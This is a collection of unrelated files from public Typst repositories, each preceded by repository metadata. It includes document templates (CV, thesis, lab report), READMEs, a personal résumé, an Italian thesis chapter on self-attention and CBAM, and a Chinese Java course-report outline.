#set par(justify: true)
//#show : dark-theme
#show link: (it) => underline(text(fill: rgb("#0B0080"), it))
// TODO : show rule for JVM, JS, Kotlin, Java, C++ icon
#body
]
|
|
https://github.com/typst/packages | https://raw.githubusercontent.com/typst/packages/main/packages/preview/minimalistic-latex-cv/0.1.0/lib.typ | typst | Apache License 2.0 | #let cv(
name: "",
metadata: (),
photo: none,
lang: "en",
body,
) = {
set document(author: name, title: name + " CV")
set page(
margin: (x: 30pt, y: 30pt),
)
set text(0.9em, font: "New Computer Modern", lang: lang)
show heading.where(level: 1): it => {
set text(0.9em, weight: "light")
smallcaps(it)
v(-13pt)
line(length: 100%, stroke: 0.5pt)
v(3pt)
}
show list.item: it => {
block(inset: (left: 10pt))[#it]
}
set par(justify: true)
if photo != none {
text(1.7em, weight: "bold", name)
v(-10pt)
set image(width: 20%)
photo
place(
top + right,
{
for data in metadata {
align(end, text(upper(data.at(0).slice(0, 1)) + data.at(0).slice(1) + ": " + data.at(1)))
v(-6pt)
}
},
)
} else {
align(center, text(2.2em, weight: "bold", name))
if metadata.len() != 0 {
v(-15pt)
align(center, text(0.9em, metadata.values().join(" | ")))
}
}
body
}
#let entry(
title: str,
name: str,
date: str,
location: str,
) = {
grid(
columns: (50%, 50%),
rows: (auto, auto, auto, auto),
row-gutter: 6pt,
text(weight: "bold", title),
align(end, date),
text(style: "italic", name),
align(end, text(style: "italic", location))
)
v(-15pt)
}
|
https://github.com/mrtz-j/typst-thesis-template | https://raw.githubusercontent.com/mrtz-j/typst-thesis-template/main/modules/epigraph.typ | typst | MIT License | #let epigraph-page(body) = {
// --- Epigraphs ---
page(
numbering: none,
align(right + bottom)[
#body
],
)
}
|
https://github.com/Myriad-Dreamin/typst.ts | https://raw.githubusercontent.com/Myriad-Dreamin/typst.ts/main/fuzzers/corpora/math/attach-p3_00.typ | typst | Apache License 2.0 |
#import "/contrib/templates/std-tests/preset.typ": *
#show: test-page
// Test limit.
$ lim_(n->oo \ n "grows") sum_(k=0 \ k in NN)^n k $
|
https://github.com/pluttan/typst-bmstu | https://raw.githubusercontent.com/pluttan/typst-bmstu/main/README.md | markdown | MIT License | # [BMSTU typst](https://github.com/pluttan/typst-bmstu)
В данном репозитории представлены основные шаблоны работ для студентов, оформленные в типографической системе [Typst](https://typst.app):
## Установка
Склонируйте репозиторий в `$HOME`
```bash
git clone https://github.com/pluttan/typst-bmstu $HOME/typst-bmstu
```
И запустите инсталлятор:
```bash
~/typst-bmstu/install.sh
```
## Пример студенческой работы
`TODO`
## TODO
- [ ] Пример работы
- [ ] Config-файл
- [ ] Титульник для отчетов
- [ ] Титульник для РПЗ
|
https://github.com/MH0386/MH0386 | https://raw.githubusercontent.com/MH0386/MH0386/main/resume.typ | typst | #set text(size: 10pt)
#align(center)[
#smallcaps[#text(weight: "black", size: 20pt)[<NAME>]] \
Undergraduate Student \
#link("mailto:<EMAIL>")[<EMAIL>] |
#link("tel:+201126748566")[+201126748566] |
Ezz El-Deen Omar Street, Giza, Egypt \
#strong[
#link("https://mh0386.github.io")[My Website] |
#link("https://github.com/MH0386")[GitHub] |
#link("https://linkedin.com/in/MH0386")[Linkedin]
]
]
#let chiline() = {v(-3pt); line(length: 100%); v(-5pt)}
= #smallcaps[Education]
#chiline()
#strong[Cairo University] #h(1fr) Giza, Egypt \
Artificial Intelligence Department, Bachelor of Computer Science #h(1fr) October 2020 - July 2024
= #smallcaps[Experience]
#chiline()
#strong[Science Land | Artificial Intelligence Intern] #h(1fr) Cairo, Egypt | 1 August 2023 - 31 August 2023 \
#strong[Coding Raja Technologies | Machine Learning Intern] #h(1fr) Telangana, India | 1 July 2023 - 31 July 2023 \
#strong[GDSC Cairo University | Machine Learning Intern] #h(1fr) Giza, Egypt | 1 February 2023 - 30 April 2023
= #smallcaps[Skills]
#chiline()
#strong[Programming Languages:] Python, Java, C++, Dart, SQL \
#strong[Libraries / Frameworks:] TensorFlow, PyTorch, NumPy, Pandas \
#strong[Tools / Platforms:] Machine Learning, Jupyter Notebook \
= #smallcaps[Projects]
#chiline()
#strong[Car Price Prediction] #h(1fr) #link("https://github.com/MH0386/car_price_prediction")[GitHub] \
#strong[Motorcycle Data Analysis] #h(1fr) #link("https://github.com/MH0386/motorcycle_data_analysis")[GitHub] \
#strong[Logistic Regression] #h(1fr) #link("https://github.com/MH0386/logistic_regression")[GitHub] \
= #smallcaps[Certifications]
#chiline()
- Git and GitHub - #strong[#link(
"https://almdrasa.com/certificate-verification/14AC69499-1454BFCF0-12722213C",
)[Almdrasa]] \
- Machine Learning Specialization - #strong[#link("https://coursera.org/verify/specialization/3BRYQRFUD5C6")[Coursera]] \
- Unsupervised Learning, Recommenders, Reinforcement Learning - #strong[#link("https://coursera.org/verify/B4NKPXD9UN9Z")[Coursera]] \
- Advanced Learning Algorithms - #strong[#link("https://coursera.org/verify/HM55XWLDYPA3")[Coursera]] \
- Supervised Machine Learning: Regression and Classification - #strong[#link("https://coursera.org/verify/XX8THJA26UTS")[Coursera]] \
- Python - #strong[#link("https://www.kaggle.com/learn/certification/mh0386/python")[Kaggle]] \
- Dart Functions Framework - #strong[#link("https://coursera.org/verify/X3R4PWA6F6DU")[Coursera]] \
- Dart: Introducing Class Abstraction - #strong[#link("https://coursera.org/verify/CBTJ62YWD3K7")[Coursera]] \
- Dart: Using Functions with Lists and Maps - #strong[#link("https://coursera.org/verify/XNCT9EVVDSN6")[Coursera]] \
- Dart: Variables, Data Structures, Objects, and Conditionals - #strong[#link("https://coursera.org/verify/ZPR9YGTJKDSM")[Coursera]] \
- Introduction to Dart - #strong[#link("https://coursera.org/verify/ZBJPMK8L47M2")[Coursera]] \
- Introduction to Java - #strong[#link("https://coursera.org/verify/UTPHVJYUDJV5")[Coursera]] \
- Java Basics: Selection and Iteration - #strong[#link("https://coursera.org/verify/JTM9KQJRRVPX")[Coursera]] \
- SQL - #strong[#link("https://www.sololearn.com/certificates/CT-D0OEQKTQ")[Sololearn]] \
- C++ Basics: Selection and Iteration - #strong[#link("https://coursera.org/verify/XBZVNYQD2ULL")[Coursera]] \
- Basic English 1: Elementary - #strong[#link("https://www.futurelearn.com/certificates/6b0dwsc")[FutureLearn]] \
- Python Programming Basics - #strong[#link(
"https://maharatech.gov.eg/badges/badge.php?hash=cdd36d5d43a2643e0b4b1ef117580488dc81fee7",
)[MaharaTech]]
= #smallcaps[Awards]
#chiline()
#strong[Certificate of Appreciation] \
Issued by Egyptian Natural Gas Company (GASCO) for Success in High School with a High Score |
|
https://github.com/schmidma/typst-workshop | https://raw.githubusercontent.com/schmidma/typst-workshop/main/examples/12-bibliography.typ | typst | Creative Commons Zero v1.0 Universal | This is a citation to a paper by @johnson2022ai. Followed by a work of <NAME> @smith2023modern.
#bibliography("literature.bib") |
https://github.com/data-niklas/typst_live | https://raw.githubusercontent.com/data-niklas/typst_live/main/README.md | markdown | MIT License | # Typst live
Create beautiful PDF's right in your browser using [Typst](https://typst.app). This project brings Typst into your browser using WASM.
## Features
- Create PDF's completely locally (after loading the page, no further internet connection is required, except to load further packages)
- Support for Typst packages (introduced in Typst 0.6.0)
- Toggle between automatic PDF creation and Ctrl-S
- Uncluttered UI providing the most space to write PDF's
- Store the document content in your URL, to easily share documents: [This README as a Typst document](https://typo.man.cy/?text=eNp9Uz1vGzEM3e9XEMlQB_BHpg4BPBQJDARIiqK20aHwoNPx7tjIkkpRdvzvS53tpDWKTBIl8fHx8ek69WEPjvzLHWTfIOsWqzmsDjGJnu-wumc0glCjyUJtdvDtYf<KEY>gMNYd9QoacyHdwXQBHV71ITHezmRSwqYnx6ubnALyZwqqn<KEY>_gf<KEY>sd<KEY>iia773SoeBByTH-zsTYj<KEY>is<KEY>xq43wLI8Xn0G<KEY>7_Ty9LYmr0HWuqCt7RA-qcdgaIVtaAlu6K3SMb-Be2E2WmrL21mVRzgq4fiwi7uitu21Q9KTFsfDdM53VKSQlMA6vmmDzFv3QspT1PMf196dxSUSTSOVLveH312lQ_2sQrB6CKig6mYKnYpW-neEOzzNNkLLtwSSoje3R6b0WTpQuRm8zs0JrrSaoWAU0<KEY>)
## Note
Do not use this for large projects such as bachelor thesis. This project currently does not support multiple files such as a bibtex.
## Libraries
- [Simple notify](https://github.com/simple-notify/simple-notify) under MIT for notifications
- [Split grid](https://github.com/nathancahill/split/) under MIT for the middle split pane
- Favicon by [Feathericons](https://github.com/feathericons/feather)
|
https://github.com/Jollywatt/typst-wordometer | https://raw.githubusercontent.com/Jollywatt/typst-wordometer/master/README.md | markdown | MIT License | # `wordometer`
[](docs/manual.pdf)

[](https://github.com/Jollywatt/typst-wordometer)
A small [Typst]("https://typst.app/") package for quick and easy in-document word counts.
## Basic usage
```typ
#import "@preview/wordometer:0.1.3": word-count, total-words
#show: word-count
In this document, there are #total-words words all up.
#word-count(total => [
The number of words in this block is #total.words
and there are #total.characters letters.
])
```
## Excluding elements
You can exclude elements by name (e.g., `"caption"`), function (e.g., `figure.caption`), where-selector (e.g., `raw.where(block: true)`), or label (e.g., `<no-wc>`).
```typ
#show: word-count.with(exclude: (heading.where(level: 1), strike))
= This Heading Doesn't Count
== But I do!
In this document #strike[(excluding me)], there are #total-words words all up.
#word-count(total => [
You can exclude elements by label, too.
#[That was #total.words, excluding this sentence!] <no-wc>
], exclude: <no-wc>)
```
|
https://github.com/xbunax/tongji-undergrad-thesis | https://raw.githubusercontent.com/xbunax/tongji-undergrad-thesis/main/init-files/sections/05_conclusion.typ | typst | MIT License | #import "../../tongji-undergrad-thesis/elements.typ": *
= 总结与未来工作展望
本节通常用于对论文进行总结和归纳,并提出未来工作的展望和建议。
在总结部分,需要回顾研究内容和方法,对研究结果进行分析和归纳,并阐述研究工作的贡献。同时,也要对研究过程中存在的问题和不足进行反思和总结,为未来的研究提供参考和启示。
在未来工作展望部分,需要具体提出研究计划和建议,为后续研究提供方向和指导。同时,也要对本文提出的方法和技术进行展望,探索其在未来研究中的应用前景和发展方向。此外,还可以指出当前领域中存在的未解决问题,为未来研究提供新的研究思路和方向。
此外,未来工作展望中还可以对本文研究的局限性进行讨论和说明,提出改进和扩展的方向。同时,也要注意将未来工作展望与本文研究内容相互关联,以确保研究的连续性和完整性。
最后,需要强调本文研究的意义和价值,并对读者进行总结和启示,为相关领域的研究提供借鉴和参考。在撰写总结与未来工作展望时,需要遵循逻辑清晰、表达准确、语言简练的原则,使得整篇论文的结论和建议具有可读性和可信度。 |
https://github.com/typst/templates | https://raw.githubusercontent.com/typst/templates/main/icicle/README.md | markdown | MIT No Attribution | # icicle
Help the Typst Guys reach the helicopter pad and save Christmas! Navigate them
with the WASD keys and solve puzzles with snowballs to make way for the Typst
Guys.
This small Christmas-themed game is playable in the Typst editor and best
enjoyed with the web app or `typst watch`. It was first released for the 24 Days
to Christmas campaign in winter of 2023.
## Usage
You can use this template in the Typst web app by clicking "Start from template"
on the dashboard and searching for `icicle`.
Alternatively, you can use the CLI to kick this project off using the command
```
typst init @preview/icicle
```
Typst will create a new directory with all the files needed to get you started.
## Configuration
This template exports the `game` function, which accepts a positional argument for the game input.
The template will initialize your package with a sample call to the `game`
function in a show rule. If you want to change an existing project to use this
template, you can add a show rule like this at the top of your file:
```typ
#import "@preview/icicle:0.1.0": game
#show: game
// Move with WASD.
```
You can also add your own levels by adding an array of level definition strings
in the `game` function's named `levels` argument. Each level file must conform
to the following format:
- First, a line with two comma separated integers indicating the player's
starting position.
- Then, a matrix with the characters f (floor), x (wall), w (water), or g
(goal).
- Finally, a matrix with the characters b (snowball) or _ (nothing).
The three arguments must be separated by double newlines. Additionally, each
row in the matrices space-separates its values. Newlines terminate the rows.
Comments can be added with a double slash. Find an example for a valid level
string below:
```
// The starting position
0, 0
// The back layer
f f f w f f f
f f f w f f f
f f x w f f f
f f f w f f f
f f f w f x x
x x x g x x x
// The front layer.
_ _ b _ _ _ _
_ _ b _ _ _ _
_ _ _ _ b _ _
_ _ _ _ b _ _
_ _ _ _ _ _ _
_ _ _ _ _ _ _
```
It's best to put levels into separate files and load them with the `read`
function.
|
https://github.com/GYPpro/Java-coures-report | https://raw.githubusercontent.com/GYPpro/Java-coures-report/main/README.typ | typst | #set page(
paper:"a4",
)
#set text(
font:("Times New Roman","Source Han Serif SC"),
style:"normal",
weight: "regular",
size: 13pt,
)
#set text(font:("Times New Roman","Source Han Serif SC"))
#show raw.where(block: false): box.with(
fill: luma(240),
inset: (x: 3pt, y: 0pt),
outset: (y: 3pt),
radius: 2pt,
)
// Display block code in a larger block
// with more padding.
#show raw.where(block: true): block.with(
fill: luma(240),
inset: 10pt,
radius: 4pt,
)
#outline(
title: "Catelog"
);
#pagebreak()
= sis0:命令行编译
#pagebreak()
= sis1:基础IO操作
使用了Scanner实现了输入一个给定长度的差分数组,求出其原数组,即对数组进行逐项求和。
#pagebreak()
= sis2:UID管理器
提供三种类型的UID生成、申请与维护。
+ 基于日期的UID,例如2022101149
+ 完全无序的类激活码,例如AA2CA-STBS3-AED2P-RDGSSP
+ 按顺序发放的序列,可选固定位数,例如00001,00002
可以保证所有UID不会重复。
类中储存所有UID对应的引用。
申请复杂度O(1),引用复杂度O(log(n))
测试用例的控制台规则:\
中括号内为需要填入字符串\
尖括号为可选参数,默认为列表第一个
#figure(
table(
columns: 2,
align: left+horizon,
[```shell-unix-generic
getUID <type: "date" | "code" | "seq"> [name]
```],[申请对应类型的新UID,并与一个引用名称name绑定],
[```shell-unix-generic
secUID <type: "date" | "code" | "seq"> [UID]
```],[查找UID对应的引用名称]
)
)
#pagebreak()
= sis3:实现一个trie(字典树)模板
#pagebreak()
= sis4:实现一个高性能的基础正则表达式匹配solution类
正则表达式
#pagebreak()
= sis5:学生信息管理器
提供了三个类,其中SchoolLib为主类,提供了对学生以下操作:
+ 添加学生并自动创建学号
+ 添加课程并自动生成课程编号
+ 学生选课
+ 记录考试成绩,补考成绩
+ 与平时分加权,计算总评成绩
+ 计算绩点
+ 以绩点、学号、姓名字典序等对学生排序
保证所有操作线程安全,必要的地方法进行了异常处理与保护性拷贝。
测试用例的控制台规则:\
中括号内为需要填入字符串\
尖括号为可选参数,默认为列表第一个
#set align(left)
#align(left+horizon)[
#figure(table(
columns: 2,
align: left+horizon,
[#align(left)[```shell-unix-generic
addStu [student name]
```]],[添加学生],
[#align(left)[```shell-unix-generic
addCur [Course name] [teacher name] [credit]
```]],[添加课程],
[#align(left)[```shell-unix-generic
celCur [student UID] [Course name]
```]],[选课],
[#align(left)[```shell-unix-generic
showStu <sort with:"UID" | "name" | "GPA">
```]],[显示学生列表],
[#align(left)[```shell-unix-generic
showCur <sort with:"UID" | "Course name" | " teacher name">
```]],[显示课程列表],
[#align(left)[```shell-unix-generic
addScore [student UID] [Course name] [Normally score] [Exam score]
```]],[添加成绩],
[#align(left)[```shell-unix-generic
addResc [student UID] [Course name] [Exam score]
```]],[添加补考成绩],
[#align(left)[```shell-unix-generic
cacu
```]],[计算总评成绩与绩点]
))
]
#pagebreak()
= sis6:实现一个线段树泛型模板
线段树是一种较为复杂的数据结构,旨在快速解决区间数据批量修改与特征统计。\
本类实现了一个可以批量地对数据进行线性空间内加和运算的线段树,统计内容为区间内的最大值,对于每个操作:
+ 修改单点:时间复杂度为$O(log n)$
+ 修改区间:均匀修改与查询后最坏时间复杂度为每点渐进$O(log (n m))$,n为内容总数,m为修改区间长度
+ 查询区间:$O(log n)$
#pagebreak()
= sis7:实现对网络最大流与最小费用流问题的solution类
最大流问题叙述略
#pagebreak()
= sis8:实现一个瘟疫传播的可视化模拟
#pagebreak()
= sis9:实现一个较为复杂的线性代数计算器
#figure(
table(
align: left+horizon,
columns: 3,
[myLinearLib],[线性计算主类],
[myLinearEntire],[线性空间元素],
[
抽象类:具有线性性质的基础运算
],
[myLinearSpace],[线性空间],[
+ 基础运算
+ 基
+ 计算秩
+ 对应矩阵
],
[myMatrix],[矩阵],[
+ 基础运算
+ 求秩
+ 行列式
+ 逆
+ 转置
+ 对角化
],
[myPolynomial],[多项式],[
+ 基础运算
+ 求值
],
[myRealNum],[实数],[
+ 基础运算
]
)
)
实现的功能:控制台指令如下:
中括号内为需要填入字符串\
尖括号为可选参数,默认为列表第一个
#figure(
table(
align: left+horizon,
columns: 2,
[```shell-unix-generic
addMat [columns] [rows] [digit(1,1)] ... [digit(c,r)]
```],[添加一个列数为columns,行数为rows的矩阵],
[```shell-unix-generic
addPol [dim] [digit 1] ... [digit r]
```],[添加一个阶数为r的多项式],
[```shell-unix-generic
addLS [rank] [LE name 1] ... [LE name r]
```],[添加一个以`LE 1~r`为基的线性空间],
[```shell-unix-generic
show <scope :"all" | "Mat" | "Pol" | "LS">
```],[列出对应的所有元素],
[```shell-unix-generic
cacuMat [Mat name] <type :"Det" | "Rank" | "inverse" | "transpose" | "Eig">
```],[计算矩阵的行列式、秩、逆、转置和对角化],
[```shell-unix-generic
cacuPol [Pol name] [digit]
```],[计算多项式的值],
[```shell-unix-generic
op [LE name1] <operator :"+" | "-" | "*"> [LE name2]
```],[对线性空间元素进行基础运算]
)
)
|
|
https://github.com/RiccardoTonioloDev/Bachelor-Thesis | https://raw.githubusercontent.com/RiccardoTonioloDev/Bachelor-Thesis/main/chapters/attention.typ | typst | Other | #pagebreak(to: "odd")
= _Attention_ <ch:attention>
Le reti neurali convoluzionali, sebbene funzionino particolarmente bene per essere addestrate su immagini e video, hanno un problema alla base, ovvero non sono in grado di considerare delle dipendenze a lungo raggio tra i vari _pixel_ o _patch_ del contenuto in analisi.
Alcune delle conseguenze che questo comporta sono:
- Un campo ricettivo limitato alla dimensione del @kernel;
- Il campo ricettivo cresce linearmente con la profondità della rete, e quindi potrebbero essere necessarie reti estremamente profonde, perchè il modello riesca ad analizzare un contesto globale;
- I pesi dopo l'addestramento del modello rimangono fissi e non possono quindi adattarsi dinamicamente al contesto globale dell'immagine.
Tuttavia, negli anni precedenti una particolare tecnica (originariamente pensata per il @nlp) è emersa anche nel campo della _computer vision_, l'attenzione.
I meccanismi di attenzione cercano di captare dipendenze a lungo raggio al fine di migliorare, spesso significativamente, la qualità della predizione.
Il contenuto delle seguenti sezioni è riassumibile come segue:
- @sa:ch: descrive un potente ma computazionalmente costoso meccanismo di attenzione, il quale però permette miglioramenti significativi nelle predizioni, andando a trovare correlazioni tra ogni _pixel_ o _patch_ del contenuto analizzato;
- @cbam:ch: descrive un meccanismo di attenzione più leggero, creato apposta per essere utilizzato in reti a collo di bottiglia, cercando di estrarre informazioni significative, prima della riduzione di dimensionalità, analizzando prima la dimensione dei canali, e poi la dimensione spaziale (altezza e larghezza).
#block([
== _Self attention_ <sa:ch>
La _self attention_ è sostanzialmente un meccanismo originariamente creato per riuscire a trovare correlazioni tra le parole di una frase, di modo da assegnare dei pesi a ciascuna di esse per fornire una migliore predizione @aiayn.
],breakable: false,width: 100%)
Tuttavia nel lavoro discusso in @sa, viene descritta un'architettura che permette l'uso di principi simili, al fine di trovare correlazioni ad ampio raggio tra i vari _pixel_ dei contenuti analizzati.
Viene quindi enunciato il concetto di _operatore non locale_ ovvero il blocco presentato in @sa che calcola la risposta in una posizione come una media ponderata delle caratteristiche di tutte le posizioni dell'_input_.
#block([
L'architettura del _Non-local block_ è la seguente:
#figure(image("../images/architectures/Attention-sa.drawio.png",width: 300pt),caption: [Il _Non-local block_, presentato in @sa])
In questo caso "$times.circle$" rappresenta la moltiplicazione tra matrici.
],breakable: false,width: 100%)
#block([
Come in @aiayn, anche in questo blocco si identificano tre entità per riuscire ad ottenere l'attenzione:
- *Query* (Q): rappresenta la posizione per la quale stiamo calcolando l'_output_ non locale;
],breakable: false,width: 100%)
- *Key* (K): rappresenta le posizioni con cui la query viene confrontata per determinare la somiglianza;
- *Value* (V): rappresenta le informazioni che vengono aggregate per formare l'_output_ finale.
Si vuole far notare che in questo caso le tre matrici sono matrici della dimensione di $"numCanali" times ("altezza"dot"larghezza")$, questo per far si che le moltiplicazioni matriciali combinino il valore di un _pixel_ con tutti gli altri.
La prima moltiplicazione tra matrici $Q dot K$ rappresenta il calcolo dell'affinità, ovvero calcolare i pesi di attenzione che determinano l'influenza di ogni _pixel_ (la colonna di $K$ presa in considerazione) sul _pixel_ in analisi (la riga di $Q$ presa in considerazione).
Successivamente le affinità calcolate vengono normalizzate tramite una funzione _softmax_ per ottenere i veri pesi di attenzione $A$.
Il prodotto matriciale $A dot V$ invece va a creare un'aggregazione ponderata delle informazioni, dando quindi luogo alla matrice di attenzione $Y$.
Questa viene poi moltiplicata per un peso apprendibile (equivalente ad applicare una convoluzione $1 times 1 times 1$), anche chiamato $gamma$, che serve per apprendere quanto applicare dell'attenzione calcolata.
Essendo in seguito fatta una somma tensoriale tra l'_input_ (anche detto _residual_, come menzionato in @resnet) e il risultato del calcolo dell'attenzione, il $gamma$ può anche partire da 0, andando quindi inizialmente a non applicare attenzione, questo per stabilizzare inizialmente il _training_ del modello.
#block([
== _Convolutional Block Attention Module_ <cbam:ch>
Il _Convolutional Block Attention Module_ (CBAM), presentato in @CBAM è un blocco fortemente basato sulle convoluzioni, che combina la _channel_ e la _spacial attention_, per migliorare le predizioni del modello.
],breakable: false,width: 100%)
#block([
Elementi di particolare interesse per questo modello sono:
- La capacità di riuscire comunque, anche se non come per la _self attention_, nel catturare relazioni globali;
],breakable: false,width: 100%)
- Aumentare l'efficienza computazionale poichè aggiunge, rispetto ad altri meccanismi di attenzione, solo un discreto numero di parametri alla rete e nessuna moltiplicazione matriciale.
Il blocco CBAM è principalmente composto da due sotto-moduli, uno per calcolare l'attenzione sui canali, che una volta combinato mediante un @hadamard con il _residual_ dell'_input_, viene passato al modulo di attenzione spaziale.
L'_output_ di attenzione spaziale viene poi combinato con il _residual_ dell'_output_ del modulo di attenzione sui canali mediante un @hadamard, generando quindi l'_output_ con l'attenzione applicata.
#block([
L'architettura del blocco CBAM è quindi la seguente:
#figure(image("../images/architectures/Attention-CBAM.drawio.png",width: 300pt),caption: [Il _Convolutional Block Attention Module_, presentato in @CBAM])
],breakable: false,width: 100%)
Il modulo di attenzione sui canali, opera sulla spazialità del tensore (altezza e larghezza) mediante _pooling_ massimo e _pooling_ medio, andando quindi a creare due vettori, i quali rappresenteranno il valore massimo e la media di ciascun canale del tensore di _input_.
Successivamente entrambi questi vettori vengono passati attraverso un _multi layer perceptron_ da tre strati, con il primo e l'ultimo dalle medesime dimensioni dell'_input_, mentre quello centrale, essendo più piccolo, applica un fattore di compressione.
Entrambi i vettori risultanti vengono poi sommati tra loro e passati attraverso una sigmoide, la quale genererà il vettore di attenzione sui canali.
#block([
L'architettura è la seguente:
#figure(image("../images/architectures/Attention-CBAM-ca.drawio.png",width: 300pt),caption: [Il modulo di attenzione sui canali, presentato in @CBAM])
],breakable: false,width: 100%)
Il modulo di attenzione spaziale invece, opera sulla profondità del tensore (i canali) mediante _pooling_ massimo e _pooling_ medio, andando quindi a generare due matrici, le quali rappresenteranno i valori massimi e i valori medi sui canali, per ciascun elemento nelle coordinate dell'altezza e della larghezza.
Queste matrici vengono concatenate sulla dimensione dei canali e successivamente passate attraverso una convoluzione con @kernel di dimensione $3times 3$. Infine l'_output_ di questa operazione viene passato attraverso una sigmoide che genererà quindi la matrice di attenzione sulla spazialità.
#block([
Questa è quindi l'architettura:
#figure(image("../images/architectures/Attention-CBAM-sa.drawio.png",width: 300pt),caption: [Il modulo di attenzione sulla spazialità, presentato in @CBAM])
],breakable: false,width: 100%)
Come spesso viene fatto, in @CBAM viene anche citata la possibilità di aggiungere uno step dove all'attenzione calcolata viene poi sommato il _residual_ dell'_input_, al fine di stabilizzare l'apprendimento.
Questo lo rende particolarmente interessante per la famiglia delle reti convoluzionali ResNet @resnet, in quanto fortemente basata su questo meccanismo.
Si può quindi implementare un approccio ResNet, ponendo il blocco CBAM subito dopo una convoluzione, per poi sommare il suo _output_ all'_output_ della convoluzione iniziale.
#block([
L'architectura proposta è quindi la seguente:
#figure(image("../images/architectures/Attention-CBAM-resnet.drawio.png",width: 200pt),caption: [Applicazione del blocco CBAM con approccio _ResNet_])
],breakable: false,width: 100%)
|
https://github.com/lucannez64/Notes | https://raw.githubusercontent.com/lucannez64/Notes/master/Nvim.md | markdown | ## Plugins
- Lazy
- Catppuccin
- Typst
- Telescope
- Treesitter
- Lualine
- Mason
- nvim-cmp
- LuaSnip
|
|
https://github.com/Mc-Zen/zero | https://raw.githubusercontent.com/Mc-Zen/zero/main/src/impl.typ | typst | MIT License | // Access to implementation for third-party packages. Note: this API may be unstable.
#import "formatting.typ"
#import "parsing.typ"
#import "utility.typ"
#import "rounding.typ" |
https://github.com/fredguth/typst-business-model-canvas | https://raw.githubusercontent.com/fredguth/typst-business-model-canvas/main/biz_canvas.typ | typst | #import "@preview/tablex:0.0.5": tablex, rowspanx, colspanx, hlinex, cellx
#let canvas(
title:[],
business:[],
problems:[],
activities:[],
metrics:[],
proposition:[],
unfair:[],
channels:[],
clients:[],
costs:[] ,
revenues:[],
) = {
set page(
"a4",
flipped: true,
fill: rgb("f2e5dd"),
margin: (1em)
)
set text(font: "Arial")
pad(x:4em, top:6em, bottom: 4em)[
#place(dy:-5em, title)
#place(left, dy:-6em, dx: 15.5cm, box(
fill: luma(240),
radius: 1em,
width: 10.2cm,
height: 2cm,
inset: 1em,
business))
#tablex(
columns: (2fr, 2fr, 1fr, 1fr, 2fr, 2fr),
rows: (1fr, 1fr, 1fr),
inset: 1em,
rowspanx(2)[
#problems
],[
#activities
], cellx(colspan: 2, rowspan:2)[
#proposition
], [
#unfair
], rowspanx(2)[
#clients
],
(), [
#metrics
], (), [
#channels
],(),
cellx(colspan:3)[
#costs
], cellx(colspan:3)[
#revenues
]
)
]
} |
|
https://github.com/Nikudanngo/typst-ja-resume-template | https://raw.githubusercontent.com/Nikudanngo/typst-ja-resume-template/main/main.typ | typst | MIT License | #import "template.typ": *
#let title = [#text(tracking: 1em,size: 14pt,[履歴書])]
#let fontSerif = ("Noto Serif", "Noto Serif CJK JP")
#let fontSan = ("Noto Sans", "Noto Sans CJK JP")
#set text(font: fontSerif, size: systemFontSize)
#set page(paper: "jis-b5",margin: 1.5cm)
= #title
// 使い方の説明。
// "私"と"アドレス"など日本語名の関数の引数を変更してください。
#move( dy: -1cm,
stack(
align(bottom,
grid(
columns: (5fr,2fr),
私(
性読み: "りれきしょ",
名読み: "たろう",
性: "履歴書",
名: "太郎",
生年月日: "平成xx年xx月xx日",
年齢: 99
),
証明写真(写真: "image/testImage.png")
// 証明写真()
),
),
アドレス(
住所ふりがな1: "とうきょうとすみだくおしあげ",
住所1: "東京都墨田区押上1丁目1−2",
郵便番号1: "131-0045",
電話番号1: "123-4567-8901",
Email1: "<EMAIL>",
住所ふりがな2: "",
住所2: "https://github.com/Nikudanngo/typst-ja-resume-template",
郵便番号2: "",
電話番号2: "",
Email2: ""
),
linebreak(),
経歴(
mode: "学歴・職歴",
columns: 14,
grid(
gutter: 0.61cm,
学歴(),
学歴(
年: "平成1",
月: "10",
学歴: "俺、爆誕"
),
学歴(
年: "平成20",
月: "3",
学歴: "スクスク育つ"
),
学歴(
年: "平成30",
月: "4",
学歴: "宇宙大学ツヨツヨ学部エンジニア学科 入学"
),
学歴(
年: "令和1",
月: "8",
学歴: "大規模開発サークル設立 \u{2192} サークル崩壊"
),
linebreak(),
職歴(),
職歴(
年: "令和6",
月: "4",
職歴: "大手IT系メーカーベンチャー企業 就職"
),
以上()
)
),
),
)
#pagebreak()
#stack(
経歴(
mode: "学歴・職歴",
columns: 5,
hegithLength: 5cm,
linebreak(),
// grid(
// gutter: 0.61cm,
// 資格(
// 年: "平成1",
// 月: "10",
// 資格: "大学入学"
// ),
// )
),
linebreak(),
経歴(
mode: "資格",
columns: 7,
hegithLength: 6.6cm,
grid(
gutter: 0.61cm,
資格(
年: "平成1",
月: "12",
資格: "普通自動車免許 取得"
),
)
),
linebreak(),
志望動機(
[私がこの職に応募する理由は、]
),
linebreak(),
本人希望(
[私は〇〇がしたい]
),
place(
bottom + right,
dy: 10pt,
[Made with Typst]
)
) |
https://github.com/wangwhh/AETG-algorithm | https://raw.githubusercontent.com/wangwhh/AETG-algorithm/master/report/assets/report-template.typ | typst | #let song = ("Times New Roman", "SimSun")
// #let song = "Source Han Serif SC"
#let san = 16pt
#let xiaosan = 15pt
#let si = 14pt
#let xiaosi = 12pt
#let fake-par = {
v(-1em)
show par: set block(spacing: 0pt)
par("")
}
#let cover(
course: "",
name: "",
college: "",
department: "",
major: "",
id: "",
advisor: "",
date: "",
) = {
let info-key(body) = {
rect(
width: 100%,
height: 23pt,
inset: (x: 0pt, bottom: 1pt),
stroke: none,
align(right)[
#text(
font: song,
size: si,
body,
)],
)
}
let info-value(body) = {
rect(
width: 100%,
height: 23pt,
inset: (x: 0pt, bottom: 1pt),
stroke: (bottom: 0.5pt),
text(
font: song,
size: si,
body,
),
)
}
set align(center)
set text(font: song, size: si, lang: "zh")
pagebreak(weak: true)
v(60pt)
image("logo.svg", width: 50%)
v(20pt)
text(font: song, size: san, weight: "bold")[本科实验报告]
v(50pt)
table(
columns: (75pt, 300pt),
row-gutter: 13pt,
stroke: none,
info-key("课程名称:"), info-value(course),
info-key("姓 名:"), info-value(name),
info-key("学 院:"), info-value(college),
// info-key("系:"), info-value(department),
info-key("专 业:"), info-value(major),
info-key("学 号:"), info-value(id),
info-key("指导教师:"), info-value(advisor),
)
v(50pt)
date
pagebreak(weak: true)
}
#let report-title(
course: "",
type: "",
title: "",
name: "",
major: "",
id: "",
collab: "",
advisor: "",
location: "",
date-year: "",
date-month: "",
date-day: "",
) = {
let info-key(body) = {
rect(
width: 100%,
height: 23pt,
inset: (left: 3pt, bottom: 2pt),
stroke: none,
align(left)[
#text(
font: song,
size: xiaosi,
body,
)],
)
}
